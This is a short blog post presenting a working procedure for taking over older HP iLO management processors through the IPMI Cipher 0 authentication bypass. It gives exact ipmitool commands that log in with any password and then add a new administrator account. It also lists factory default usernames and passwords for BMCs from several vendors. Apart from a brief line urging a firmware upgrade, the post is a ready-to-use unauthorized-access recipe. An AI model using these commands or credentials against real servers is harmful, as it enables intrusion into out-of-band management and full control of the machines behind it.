Thursday, December 22, 2016

Create an HP iLo account when you don't know the Admin Password

Older versions of Out of band management processors like HP iLo, Dell DRAC, IBM IMM and Supermicro IPMI supported a feature called Cipher 0 which is clear-text authentication. But due to a flaw in the implementation ANY password works against the built in Administrator account.

Ubuntu has a package called ipmitool in it's repository. Using ipmitool you can list the users and add a new Administrative user. For HP iLo this works on firmware up to v1.6 on iLo3 and up to v1.3 on iLo4.

To install ipmitool
sudo apt-get install ipmitool

Once the install is complete you can use the list command to see the current users:

ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user list

Once you run the list command look for an ID that shows ( Empty User).

On the server I used this command on ID2 was empty so I ran:

ipmitool -I lanplus -C 0 -H  10.0.0.99 -U Administrator -P FluffyWabbit user set name 2 Monitor

to create a new user.

and finally

ipmitool -I lanplus -C 0 -H 10.0.0.99 -U Administrator -P FluffyWabbit user set password 2 SecretPassword


to create a password.


Once that was done I opened a browser and logged into iLo as an administrator using my newly created account.

Obviously this is a security issue!  You must upgrade your firmware to fix this issue.

All manufactures except HP use a default password so you don't even have to create a user if IT didn't change the default.


Product NameDefault UsernameDefault Password
HP Integrated Lights Out (iLO)Administrator<factory randomized 8-character string>
Dell Remote Access Card (iDRAC, DRAC)rootcalvin
IBM Integrated Management Module (IMM)USERIDPASSW0RD (with a zero)
Fujitsu Integrated Remote Management Controlleradminadmin
Supermicro IPMI (2.0)ADMINADMIN
Oracle/Sun Integrated Lights Out Manager (ILOM)rootchangeme
ASUS iKVM BMCadminadmin


The reference websites listed below have much more information on IPMI hacking. The link HPiLO Cmdlets is an article on using Powershell under Windows to manage iLo.




References

Hacking IPMI Cipher 0 Using Kali Linux - A nice tutorial on using ipmitool and bmc-config
A Penetration Tester's Guide to IPMI and BMCs - A great tutorial on the Cipher 0 issue and IPMI
How to find all the iLO’s on your network - A nice bash script for locating iLo devices on a subnet
HPiLO Cmdlets Version 1.2.0.0 - HP's download for iLo Powershell Cmdlets
HewlettPackard PowerShell Sample Scripts - Some official HP sample scripts
GNU FreeIPMI - A Linux package for working with BMCs
IPMITOOL useful examples
IPMI++ Security Best Practices

No comments:

Post a Comment